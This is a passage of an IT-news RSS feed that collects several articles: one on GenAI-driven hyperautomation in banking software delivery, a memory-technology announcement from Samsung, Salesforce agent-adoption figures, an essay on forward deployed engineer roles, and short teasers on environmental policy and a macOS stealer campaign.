<p class="wp-block-paragraph">The Product Development Lifecycle can itself become hyperautomated. Instead of treating ideation, analysis, design, development, testing, security review, release and operations as disconnected phases, enterprises can create an AI-assisted delivery loop where every stage produces structured artifacts that the next stage can consume. Platforms such as GitHub Copilot, Claude Code or Claude Cowork-style agentic development environments and OpenAI Codex can support this movement by helping teams reason over requirements, generate code, create tests, review changes, modernize legacy modules and produce <a href="https://www.cio.com/article/1307309/the-generative-ai-revolution-is-transforming-how-banks-work.html">documentation</a>. Their value increases when they are connected to repositories, issue trackers, design documents, build pipelines, test suites, security scanners, observability data and enterprise knowledge bases.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>PDLC Stage</strong></td><td><strong>Hyperautomation Opportunity</strong></td><td><strong>AI-Assisted Outcome</strong></td></tr><tr><td>Business discovery</td><td>Process mining, domain interviews, regulatory mapping, backlog creation</td><td>Structured epics, user stories, acceptance criteria, process maps and control requirements</td></tr><tr><td>Architecture and design</td><td>Reference architectures, API contracts, data models, event flows, security patterns</td><td>Architecture options, integration blueprints, threat-model prompts and design decision records</td></tr><tr><td>Development</td><td>Code generation, service scaffolding, UI component creation, data pipeline templates</td><td>Review-ready code increments, reusable components, migration utilities and integration adapters</td></tr><tr><td>Testing</td><td>Unit, integration, regression, performance, compliance and synthetic data testing</td><td>Generated test cases, defect reproduction steps, test automation scripts and coverage summaries</td></tr><tr><td>Security and compliance review</td><td>Static analysis, dependency checks, policy validation, evidence capture</td><td>Risk explanations, remediation suggestions, control traceability and approval evidence</td></tr><tr><td>Release and deployment</td><td>CI/CD orchestration, environment promotion, release notes, rollback preparation</td><td>Automated deployment packs, release summaries, operational checklists and change records</td></tr><tr><td>Operations and feedback</td><td>Observability, incident analysis, user feedback mining, backlog refinement</td><td>Incident summaries, root-cause hypotheses, improvement stories and reliability recommendations</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Role of GitHub Copilot, Claude Cowork and Codex</h2>



<p class="wp-block-paragraph">GitHub Copilot is useful where developers need assistance inside the engineering flow: explaining code, generating functions, proposing tests, reviewing pull requests and helping teams move from issue to implementation. In a banking PDLC, it can accelerate microservice creation, API integration, batch processing logic, reconciliation rules, regulatory validation routines and UI workflows. When used with repository context and proper review discipline, it can reduce the time developers spend on repetitive coding while preserving human accountability for design and correctness.</p>



<p class="wp-block-paragraph">Claude Cowork or Claude Code-style agentic environments are valuable for multi-file reasoning, refactoring, debugging and documentation-heavy engineering work. Banking applications often contain deep domain logic scattered across services, configuration files, stored procedures, integration scripts and test suites. An agentic coding assistant that can understand a wider codebase context can help engineers analyze dependencies, prepare modernization plans, update multiple files coherently and draft explanations for reviewers. This is particularly useful in core banking modernization, trade reporting rule updates and compliance workflow refactoring.</p>



<p class="wp-block-paragraph">OpenAI Codex can support issue-to-pull-request workflows, test generation, code review, bug reproduction, migration activities and broader software engineering tasks across the lifecycle. In a hyperautomated PDLC, Codex-like agents can be assigned well-scoped work items, asked to inspect failing tests, propose fixes, create regression coverage and summarize the change for human reviewers. The important design principle is to keep agents inside controlled boundaries: clear prompts, repository permissions, test gates, approval workflows and traceable outputs.</p>



<h2 class="wp-block-heading">Integration architecture for hyperautomated banking applications</h2>



<p class="wp-block-paragraph">A practical architecture begins with business capability decomposition. Each banking domain should be expressed as a set of bounded capabilities such as customer onboarding, account maintenance, trade enrichment, exception management, portfolio review, control attestation, report generation and audit retrieval. These capabilities should be exposed through APIs, events, workflow tasks, data products and user interfaces. Hyperautomation then connects these capabilities using orchestration engines, event streams, rules engines, AI services, RPA connectors where legacy integration is unavoidable and observability layers that capture business and technical telemetry.</p>



<p class="wp-block-paragraph">The embedded AI layer should sit behind a secure application service boundary. It should use retrieval-augmented generation where approved policies, product rules, application documentation and regulatory mappings are retrieved from trusted sources. It should avoid uncontrolled exposure of sensitive customer information. Prompt templates, response validation, redaction, grounding checks, model monitoring and human-in-the-loop approval should be part of the production design. In banking, the most successful AI pattern is often not full automation but <a href="https://www.everestgrp.com/report/egr-2024-31-v-6318/">assisted</a> decisioning with strong controls.</p>



<h2 class="wp-block-heading">Example: Hyperautomated reconciliation and reporting flow</h2>



<p class="wp-block-paragraph">Consider a reconciliation application that compares ledger balances, payment files, trade settlement records and external statements. In a conventional model, operations teams spend significant time downloading files, running macros, investigating mismatches, documenting break reasons and preparing status reports. In a hyperautomated model, data ingestion is scheduled and monitored, schema checks run automatically, matching engines classify obvious matches, AI assists with ambiguous narratives, exceptions are routed through workflow queues and dashboards update in near real time. At the end of the day, the system can generate a draft operations <a href="https://www.pwc.com/us/en/industries/financial-services/library/hyperautomation-gen-ai-in-banking.html">report</a> explaining unresolved breaks, aging trends, risk exposure and pending approvals.</p>



<p class="wp-block-paragraph">The same pattern can extend to daily, weekly and monthly reporting. Data quality rules validate inputs, report templates are populated automatically, AI generates narrative commentary on variances, reviewers approve or amend explanations and the final report is archived with lineage and approvals. Audit teams can later retrieve not only the report but also the source extracts, transformation logs, exception history, reviewer decisions and AI-generated drafts. This creates a richer control environment than manual reporting because evidence is captured by design rather than reconstructed later.</p>



<h2 class="wp-block-heading">Governance, risk and control considerations</h2>



<p class="wp-block-paragraph">Hyperautomation in banking must be designed with governance from the beginning. The development team should define which activities can be automated, which can be AI-assisted and which must remain under human approval. Source code generated by AI must pass normal engineering controls, including peer review, static analysis, dependency scanning, secure coding checks, test execution and production readiness review. Business outputs generated by AI, such as compliance narratives or client-facing explanations, should be <a href="https://www.pwc.com/us/en/industries/financial-services/library/hyperautomation-gen-ai-in-banking.html">reviewed</a> where regulatory or reputational risk is material.</p>



<p class="wp-block-paragraph">Data governance is equally important. AI-enabled applications must respect data classification, residency, retention, masking and access policies. The model should not become an uncontrolled channel through which confidential customer, trading or employee information can leak. Every prompt, retrieved source, generated response, user action and final decision may need to be logged depending on the use case. For audit applications, this traceability is not optional; it is the foundation of trust.</p>



<h2 class="wp-block-heading">Operating model for AI-native PDLC</h2>



<p class="wp-block-paragraph">A hyperautomated PDLC requires changes in team behavior. Product owners should write requirements in a structured manner so that AI tools can generate better stories, acceptance criteria and test scenarios. Architects should maintain living decision records, reference patterns and integration standards that AI agents can use as context. Developers should learn prompt discipline, context packaging and review techniques. Test engineers should focus on coverage strategy, synthetic data, compliance scenarios and defect prevention rather than only manual execution. Operations teams should feed incident <a href="https://www.cio.com/article/1307309/the-generative-ai-revolution-is-transforming-how-banks-work.html">learnings</a> back into the backlog so the system improves continuously.</p>



<p class="wp-block-paragraph">The role of human experts becomes more important, not less. AI can draft, generate, compare and suggest, but domain judgment remains essential. A trade reporting specialist understands regulatory nuance. A wealth advisor understands client suitability. A core banking architect understands transaction integrity. A compliance officer understands control interpretation. Hyperautomation works best when it amplifies these experts and removes repetitive friction around them.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">Hyperautomation in business application development is not simply a faster way to write software. It is a new way to connect business intent, engineering execution, operational control and continuous learning. In banking, where applications must be reliable, explainable, secure and compliant, the combination of embedded Generative AI and disciplined automation can transform how applications are designed, built, integrated, tested, released and operated. Trade reporting, wealth management, core banking, investment banking, compliance, reconciliation, reporting and audit functions can all benefit when AI is embedded responsibly and automation is orchestrated across the complete lifecycle.</p>



<p class="wp-block-paragraph">Platforms such as GitHub Copilot, Claude Cowork or Claude Code and OpenAI Codex can play an important role in this transformation by accelerating analysis, development, testing, review, modernization and documentation. Their greatest value appears when enterprises treat them not as isolated productivity tools but as part of a governed, AI-native PDLC. The future of banking application development will belong to teams that can combine human expertise, reusable engineering patterns, intelligent automation and strong governance into one coherent delivery model.</p>



<p class="wp-block-paragraph"><em>This article was made possible by our partnership with the IASA </em><a href="https://chiefarchitectforum.org/" target="_blank" rel="noreferrer noopener"><em>Chief Architect Forum</em></a><em>. The CAF’s purpose is to test, challenge and support the art and science of Business Technology Architecture and its evolution over time as well as grow the influence and leadership of chief architects both inside and outside the profession. The CAF is a leadership community of the </em><a href="https://iasaglobal.org/" target="_blank" rel="noreferrer noopener"><em>IASA</em></a><em>, the leading non-profit professional association for business technology architects.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Challenging Toxic Air Exemptions – and a Pattern of Executive Overreach on Regulatory Rollbacks]]></title>
<description><![CDATA[Together, the Trump administration’s vision of the Clean Air Act’s exemption authority and shutting courts out from review is one of completely unchecked presidential power.
The post Challenging Toxic Air Exemptions – and a Pattern of Executive Overreach on Regulatory Rollbacks appeared first on ...]]></description>
<link>https://tsecurity.de/de/3710263/it-security-nachrichten/challenging-toxic-air-exemptions-and-a-pattern-of-executive-overreach-on-regulatory-rollbacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710263/it-security-nachrichten/challenging-toxic-air-exemptions-and-a-pattern-of-executive-overreach-on-regulatory-rollbacks/</guid>
<pubDate>Fri, 07 Aug 2026 23:47:38 +0200</pubDate>
<content:encoded><![CDATA[<p>Together, the Trump administration’s vision of the Clean Air Act’s exemption authority and shutting courts out from review is one of completely unchecked presidential power.</p>
<p>The post <a href="https://www.justsecurity.org/151435/toxic-air-exemptions-executive-overreach/">Challenging Toxic Air Exemptions – and a Pattern of Executive Overreach on Regulatory Rollbacks</a> appeared first on <a href="https://www.justsecurity.org/">Just Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung offers future AI memory roadmap]]></title>
<description><![CDATA[Samsung Electronics has unveiled a trio of next-generation memory technologies aimed at overcoming the performance, power and capacity limitations facing artificial intelligence infrastructure.



The announcements, made at the Future of Memory and Storage (FMS) conference, introduced new concept...]]></description>
<link>https://tsecurity.de/de/3710258/it-security-nachrichten/samsung-offers-future-ai-memory-roadmap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710258/it-security-nachrichten/samsung-offers-future-ai-memory-roadmap/</guid>
<pubDate>Fri, 07 Aug 2026 23:47:17 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Samsung Electronics has unveiled a <a href="https://semiconductor.samsung.com/news-events/tech-blog/the-evolution-of-ai-era-memory-faster-denser-computing/">trio of next-generation memory</a> technologies aimed at overcoming the performance, power and capacity limitations facing artificial intelligence infrastructure.</p>



<p class="wp-block-paragraph">The announcements, made at the <a href="https://www.terrapinn.com/conference/future-memory-storage/index.stm">Future of Memory and Storage</a> (FMS) conference, introduced new concepts for vertically integrated memory along with a breakthrough NAND architecture designed for the AI era.</p>



<p class="wp-block-paragraph">The <a href="https://semiconductor.samsung.com/news-events/news/samsung-unveils-next-gen-3d-memory-vision-at-fms-2026-charting-the-future-of-ai-infrastructure/">three new memory types</a> have one thing that unites them: they all use wafer bonding. Wafer bonding is a semiconductor manufacturing process technique in which two or more completed silicon wafers are permanently joined together to form a single integrated device, the vendor stated.</p>



<p class="wp-block-paragraph">Instead of fabricating every component on one wafer, manufacturers build different parts separately, then align and bond them with extremely high precision. Think of it as a high-tech Oreo cookie.</p>



<p class="wp-block-paragraph">Wafer bonding is significant because it represents one of the few remaining ways to continue scaling semiconductor devices after conventional manufacturing techniques begin to hit physical and economic limits. It enables much higher memory density as more memory is squeezed into the same 2D space, according to the company.</p>



<p class="wp-block-paragraph">It also allows different manufacturing processes to be combined, so wafer bonding lets companies use the optimal manufacturing process for each wafer independently before joining them. Samsung said the new manufacturing technique fabricates the memory cell array and peripheral circuitry separately before bonding them together.</p>



<p class="wp-block-paragraph">It is already being used now in NAND flash memory for 3D stacking. Rather than spread the memory circuits out, they are stacked on top of each other like stories on a high-rise building. The technique was first introduced in 2014, with 24-layer NAND flash period last year it broke the 300-layer mark.</p>



<p class="wp-block-paragraph">The centerpiece of the announcement was BV-NAND, or Bonding V-NAND, Samsung’s next-generation flash memory architecture that employs wafer-bonding. The company said the technology enables NAND devices with more than 400 layers while boosting storage density by approximately 58% compared with its current V9 generation, Samsung stated.</p>



<p class="wp-block-paragraph">The company said the architecture also improves read, write and input/output performance while reducing power consumption, making it better suited for AI servers that increasingly depend on high-capacity flash storage.</p>



<p class="wp-block-paragraph">Beyond BV-NAND, Samsung outlined two longer-term memory concepts that could radically alter AI system architecture. The first, dubbed zHBM, calls for stacking HBM memory on top of the AI accelerator rather than alongside processors, as is done today.</p>



<p class="wp-block-paragraph">This shortens the distance data must travel between processor and memory. Samsung said the design could dramatically increase bandwidth while reducing power consumption and thermal resistance.</p>



<p class="wp-block-paragraph">The company estimates that combining the architecture with wafer-bonding technology could ultimately deliver more than ten times the memory density of conventional HBM5 while tripling energy efficiency and cutting thermal resistance by more than half.</p>



<p class="wp-block-paragraph">But don’t plan for deployment just yet. zHBM is still a research concept. It illustrates how memory manufacturers are increasingly looking too 3D designs to continue scaling as traditional 2D packaging becomes more difficult.</p>



<p class="wp-block-paragraph">Samsung also introduced zNAND-O, another conceptual architecture designed to extend three-dimensional memory beyond conventional NAND implementations. Details were scant but Samsung did say zNAND-O was a next-generation high-performance NAND solution built on its V-NAND technology and in development in four- and eight-layer versions.</p>



<p class="wp-block-paragraph">The technologies reflect how the industry is being driven by AI, and that AI concerns are driving chip development. HBM Has emerged as an important component of AI computation, but very quickly the industry hit limitations in terms of bandwidth and speed. The proposed technologies above reflect Samsung’s attempts to alleviate the bandwidth problem.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClickFix Attacks Deliver macOS Stealer That Can Drain Crypto Wallets]]></title>
<description><![CDATA[ClickFix-style attacks are being used to deliver a Go-based malware capable of stealing cryptocurrency assets, as well as browser-stored passwords, Apple iCloud Keychain data, and cached credentials.

The macOS-focused infection chain is designed to deliver a shell script that profiles the host a...]]></description>
<link>https://tsecurity.de/de/3710197/it-security-nachrichten/clickfix-attacks-deliver-macos-stealer-that-can-drain-crypto-wallets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710197/it-security-nachrichten/clickfix-attacks-deliver-macos-stealer-that-can-drain-crypto-wallets/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:51 +0200</pubDate>
<content:encoded><![CDATA[ClickFix-style attacks are being used to deliver a Go-based malware capable of stealing cryptocurrency assets, as well as browser-stored passwords, Apple iCloud Keychain data, and cached credentials.

The macOS-focused infection chain is designed to deliver a shell script that profiles the host and then fetches a macOS malware payload that's compatible with the computer's CPU architecture.

"]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic AI workforce is more than doubling year on year, says Salesforce]]></title>
<description><![CDATA[Salesforce customers more than doubled their agentic workforces year on year, according to the company’s second annual Agentic Enterprise Index, which looks at trends in AI agent development and deployment over the past five quarters.



It compiled data from customers who had activated agents in...]]></description>
<link>https://tsecurity.de/de/3710142/it-nachrichten/agentic-ai-workforce-is-more-than-doubling-year-on-year-says-salesforce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710142/it-nachrichten/agentic-ai-workforce-is-more-than-doubling-year-on-year-says-salesforce/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:39 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Salesforce customers more than doubled their agentic workforces year on year, according to the company’s second annual <a href="https://www.salesforce.com/agentforce/agentic-enterprise-index/" target="_blank" rel="noreferrer noopener">Agentic Enterprise Index</a>, which looks at trends in AI agent development and deployment over the past five quarters.</p>



<p class="wp-block-paragraph">It compiled data from customers who had activated agents in production every month of the analysis period to determine how their use of the technology has evolved between February 2025 and April 2026, as well as incorporating data from May 2026 Salesforce research studies.</p>



<p class="wp-block-paragraph">It found that businesses grew their agentic workforces from an average of five agents in February 2025 to 13 by April 2026, a 7% compound monthly growth rate (CMGR). In April 2026, it only took an average of 1.9 days to deploy an agent into production, a 53% decrease since the beginning of the report period.</p>



<p class="wp-block-paragraph">Not only were agents deployed more quickly, they have been progressively taking on more work once in use; over the 15 months, the average number of actions per account had a CMGR of 31%.</p>



<p class="wp-block-paragraph">“These agents are expanding beyond their initial scope to really become cross-functional,” said <a href="https://www.linkedin.com/in/caila-schwartz/" target="_blank" rel="noreferrer noopener">Caila Schwartz</a>, Salesforce’s head of agentic commerce insights, during a media briefing.</p>



<p class="wp-block-paragraph">Salesforce has attempted to measure how much work agents perform, rather than how many tokens they consume, creating its own <a href="https://www.cio.com/article/4138622/awu-by-salesforce-a-shiny-new-metric-that-tells-cios-little-of-value.html">Agentic Work Unit (AWU) metric</a>, although analysts have criticized the measure as being unrelated to business outcomes. Nevertheless, Salesforce said that as of April, Agentforce agents had performed 734 million AWUs, a number growing at about 15% each month.</p>



<p class="wp-block-paragraph">The research also showed that agents are acting across multiple cloud domains which, the company said, “underscores the practical necessity of a headless architecture. By decoupling the agent’s logic from traditional front-end user interfaces, agents can process tasks, execute actions, and trigger workflows anywhere.”</p>



<p class="wp-block-paragraph">Within the company, Salesforce itself has seen explosive growth in AI agent use, said <a href="https://www.linkedin.com/in/joseph-inzerillo-b917791/" target="_blank" rel="noreferrer noopener">Joe Inzerillo</a>, president of enterprise &amp; AI technology at Salesforce, with a threefold increase in sessions between February 2025 and April 2026. He said that the AI agent in Slack, Slackbot, saves the average employee five hours per week, with 83% of the company having adopted it.</p>



<p class="wp-block-paragraph">But Schwartz pointed out that different industries are approaching agentic AI in different ways, some more sophisticated than others. To measure that, Salesforce developed a Sophistication Index, a five-point scale scoring the cognitive complexity of an agent’s actions. Levels 1- 3  are assigned to tasks such as record lookups, drafting emails, or summarizing documents, while levels 4 and 5 include more complex functions such as updating database fields.</p>



<p class="wp-block-paragraph">The data showed that manufacturing, financial services, and healthcare and life sciences have built more sophisticated agent networks than what it called traditional AI frontrunners such as technology and retail.</p>



<p class="wp-block-paragraph">However, Inzerillo said, the most common use case industry wide, and the best place to start, is the service use case, which provides “far and away the best ROI to start with.”</p>



<p class="wp-block-paragraph">He also noted that, as people have become more conscious of what agents can do, they are asking agents to perform tasks, rather than simply answer questions.</p>



<p class="wp-block-paragraph">“Now what you’re starting to see people do is very action oriented. So instead of asking ’how do I file a form to request my vacation’ from our employee agent, they’re telling the employee agent, ‘hey I’m taking a vacation, you need to enter this form for me, and here’s the details,’” he said, adding that this bias towards action represents the evolution of agentic use.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[There are two completely different roles called ‘FDE’]]></title>
<description><![CDATA[There’s something very attractive about saying “we embed very closely with our customers and just figure it out with them”, especially since the company that started “forward deploying engineers” is growing 84% with $5B+ revenue. But “forward deployed engineer” is a vague term and means different...]]></description>
<link>https://tsecurity.de/de/3710144/it-nachrichten/there-are-two-completely-different-roles-called-fde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710144/it-nachrichten/there-are-two-completely-different-roles-called-fde/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:39 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">There’s something very attractive about saying “we embed very closely with our customers and just figure it out with them”, especially since the company that started “forward deploying engineers” is growing <a href="https://investors.palantir.com/files/2026%20Q1%20PLTR%2010-Q.pdf">84% with $5B+ revenue</a>. But “<a href="https://en.wikipedia.org/wiki/Forward_Deployed_Engineer#cite_note-1">forward deployed engineer</a>” is a vague term and means different things depending on the business you’re running.</p>



<p class="wp-block-paragraph">I spent almost 5 years at Palantir as a forward-deployed software engineer, and Palantir’s version of an “FDE” does not make sense for most companies I now meet as an early-stage VC. Depending on the type of business you’re building, this role could broadly mean one of two things: “the product builder” or “the platform operator.” Clearly defining which bucket you fall into will make it easier to hire for this role and run your FDE org.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/nature-of-work-vs-product-leverage.png?w=1024" alt="Figure: Nature of work vs. product leverage." class="wp-image-4206317" width="1024" height="578" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<h2 class="wp-block-heading">The product builder: The OG Palantir version</h2>



<p class="wp-block-paragraph">The north star is: do whatever it takes to actually solve the user’s problem. FDEs are not just responsible for making the platform work, but also discovering what to build and building it (actually creating software) in service of the customer.</p>



<h2 class="wp-block-heading">The platform operator: Solutions + technical customer success</h2>



<p class="wp-block-paragraph">The north star is: make the product work for the customer – deploy and operationalize it. This is what most startups today really mean when they want FDEs. FDEs here configure the core platform, manage account relationships and drive adoption. This is not new – companies have always had solutions engineers, sales engineers, customer success etc., although the work looks different as FDEs are increasingly building prototypes, configuring evals and building MCPs.</p>



<h2 class="wp-block-heading">Which FDE is right for you</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/customer-size.png?w=1024" alt="Figure: Customer size." class="wp-image-4206316" width="1024" height="457" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph">For most situations, hiring product builder FDEs is a mistake.</p>



<p class="wp-block-paragraph">At scale, the FDEs should be the platform operator. It’s hard to have FDEs build and maintain highly custom product features, especially as the company scales. Over time, the custom product surface area distracts from building the core product, even though AI coding tools make it easy to ship new features quickly and maintain them.</p>



<p class="wp-block-paragraph">Many fast-growing AI startups recognize these constraints and structure the FDE role more like the platform operator. This also allows them to have 5-10 accounts per FDE, which is a much higher ratio than Palantir had (at least in 2023). Even the Palantir FDE role has evolved to look more like the platform operator.</p>



<p class="wp-block-paragraph">There are, however, situations when your FDEs should be the product builder archetype.</p>



<h3 class="wp-block-heading">1. You have very large customers (F500 scale)</h3>



<p class="wp-block-paragraph"><strong>Technical complexity</strong>: Large customers have complex environments with legacy infrastructure that often requires “out-of-platform” engineering work. I often encountered bespoke data infrastructure, privacy requirements, etc. at various Palantir customers that required me to build “out-of-platform” connectors, UIs and backends.</p>



<p class="wp-block-paragraph"><strong>Organizational inertia and trust</strong>: Serving large enterprises is about building trust. In short time periods, overfitting product to a specific user/workflow is often what delivers the most value, builds trust and helps organizations get over the inertia of moving away from Excel and legacy software tools that are part of their day-to-day workflow. For AI-native startups, it’s arguably even more important to invest in doing “unscalable” development with engineering boots on the ground, as it helps solidify your right to exist and eventually expand the customer relationship.</p>



<h3 class="wp-block-heading">2. You have many ICPs and workflows</h3>



<p class="wp-block-paragraph">If you have a broad range of ICPs and workflows that you serve, your product probably is not walk-up usable on day 1 of deployment. The short-term hacky things that product builder FDEs build to make the product work for these heterogeneous users/workflows will help you shape the product long-term.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/overfit-products.png?w=1024" alt='Figure: "Overfit" products.' class="wp-image-4206313" width="1024" height="570" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph">Note: see Palantir Foundry’s architecture <a href="https://www.palantir.com/assets/xrfr7uokpv1b/mhoyY4c8vdVlJhulDStk2/a7340768109c8e8d79d00b4cb99d8e70/Whitepaper_-_Foundry_2022.pdf">here</a>.</p>



<p class="wp-block-paragraph">This was a big reason why Palantir FDEs were more like product builders (and are still able to – see the <a href="https://jobs.lever.co/palantir/dab396d4-2f14-4796-aac0-0d82883dccf0">Forward Deployed Software Engineer job profiles</a> as an example). The vision for Foundry was to be the operating system for an enterprise’s critical decisions – inherently multiple industries, users and workflows. A lot of FDE-led development showed that solving many of these use cases required complex data integrations, which led to the early versions of Foundry being best-suited for complex data integrations and building a customer’s “<a href="https://blog.palantir.com/ontology-finding-meaning-in-data-palantir-rfx-blog-series-1-399bd1a5971b">Ontology</a>”. Similarly, FDEs like myself built custom frontend applications for fraud analysis, pricing, etc. As certain patterns of what these applications required became more clear, they were centralized into an application-layer product.</p>



<h2 class="wp-block-heading">Who you should hire</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/who-you-should-hire.png?w=1024" alt="Figure: Who you hire." class="wp-image-4206314" width="1024" height="464" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/why-hire.png?w=1024" alt="Figure: Why hire one vs. the other." class="wp-image-4206315" width="1024" height="456" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph"><strong>Platform operator</strong>: There is a much broader set of people you could hire, testing for technical fluency (e.g., being good at data analysis, complex Excel work, even SQL), product intuition and an inclination to build customer relationships. Backgrounds like technical customer success, solutions engineering, software engineering, product management and consulting are all strong fits.</p>



<p class="wp-block-paragraph"><strong>Product builder</strong>: You want candidates that are high ownership and missionary software engineers, or technical PMs who want to ship products themselves.</p>



<p class="wp-block-paragraph">Hiring for these profiles, especially product builders, is hard. It’s worth calling out two things that helped Palantir hire software engineers into what might be considered a less sexy role.</p>



<ol start="1" class="wp-block-list">
<li><strong>Culture of building at the edge</strong>: Strong engineers are motivated to build things. Palantir gave FDEs a lot of ownership to build products, which is why much of the core product leadership was former FDEs.</li>



<li><strong>Cult built around mission</strong>: Internally, there was a cult-like devotion to the mission. Everyone always talked about why outcomes were far more important than software, and why most companies building tools had it wrong. I’ve never been at a company where people feel so closely bonded around a mission.</li>
</ol>



<p class="wp-block-paragraph">As founders building AI startups think about hiring FDEs, it’s worth being specific about your culture and asking: Am I just hiring people to support development teams, or am I hiring people to shape and build product? It’s hard to get software engineers (even today) to be excited about an FDE role that might just be technical customer success.</p>



<h2 class="wp-block-heading">What FDEs should be doing (regardless of archetype)</h2>



<p class="wp-block-paragraph">You’ve hired the right people. How do you best leverage your team of FDEs?</p>



<p class="wp-block-paragraph">FDEs were Palantir’s way of delivering outcomes rather than tools. AI-native startups can take this much further and FDEs can help in a few unique ways by leveraging their proximity to customers.</p>



<ol start="1" class="wp-block-list">
<li><strong>Find the most critical workflows</strong>: As AI lowers the cost of producing software, companies will face a lot more competition. FDEs at AI startups should be constantly finding ways to serve the most critical workflows for a customer and paying attention to how customers do work across newer and legacy tools. For example, FDEs at Harvey should pay attention to which workflows are in Westlaw, which ones are moving to ChatGPT/Claude, and how the Harvey product can stay ahead.</li>



<li><strong>Build around nondeterminism</strong>: In more regulated environments, FDEs should be hyper-focused on making products reliable for specific use cases <a href="https://www.anthropic.com/engineering/demystifying-evals-for-ai-agents">using evals</a> and configs. Previously, product reliability lived with product and support. As companies provide outcomes instead of tools, configuring products appropriately and managing evals shifts towards FDE teams.</li>
</ol>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beyond chatbots: How embedded GenAI is transforming banking application development]]></title>
<description><![CDATA[Business application development is entering a new operating model. The traditional approach of gathering requirements, designing screens, writing services, integrating systems, testing, fixing defects and preparing release documentation still exists, but it is no longer sufficient for enterprise...]]></description>
<link>https://tsecurity.de/de/3710146/it-nachrichten/beyond-chatbots-how-embedded-genai-is-transforming-banking-application-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710146/it-nachrichten/beyond-chatbots-how-embedded-genai-is-transforming-banking-application-development/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:39 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Business application development is entering a new operating model. The traditional approach of gathering requirements, designing screens, writing services, integrating systems, testing, fixing defects and preparing release documentation still exists, but it is no longer sufficient for enterprises that need speed, traceability, resilience and regulatory confidence at the same time. Hyperautomation brings a broader discipline to this challenge. It combines workflow orchestration, intelligent document processing, robotic automation, API-led integration, process mining, test automation, observability and artificial intelligence into a connected delivery fabric. With embedded Generative AI, this fabric becomes more adaptive because applications can interpret natural language, summarize complex data, generate explanations, detect exceptions and support decision workflows rather than merely execute predefined rules.</p>



<p class="wp-block-paragraph">In banking, this shift is especially meaningful. Banks operate across dense application landscapes: trade reporting platforms, wealth management portals, core banking systems, investment banking applications, digital compliance engines, reconciliation utilities, operational dashboards, audit repositories and daily, weekly and monthly reporting platforms. Each of these areas has its own data models, control points, integration patterns, validation rules, exception paths and regulatory obligations. Hyperautomation does not replace engineering discipline; it strengthens it by making business intent, technical execution, control evidence and continuous improvement part of the same lifecycle.</p>



<h2 class="wp-block-heading">From automation to hyperautomation in banking applications</h2>



<p class="wp-block-paragraph">Automation usually addresses a specific task: moving data from one system to another, generating a report, running a batch job or validating a transaction against a rule. Hyperautomation goes further. It looks at the complete business outcome and asks how the entire chain can be streamlined, governed, observed and improved. For example, a trade reporting process may begin with transaction capture, enrich the trade with reference data, validate regulatory fields, identify breaks, generate a submission file, transmit it to a regulator or trade repository, monitor acknowledgements and preserve audit evidence. A narrow automation script may accelerate one step, but a <a href="https://www.gartner.com/en/documents/6454507">hyperautomated design</a> coordinates the complete flow, including exception handling and evidence generation.</p>


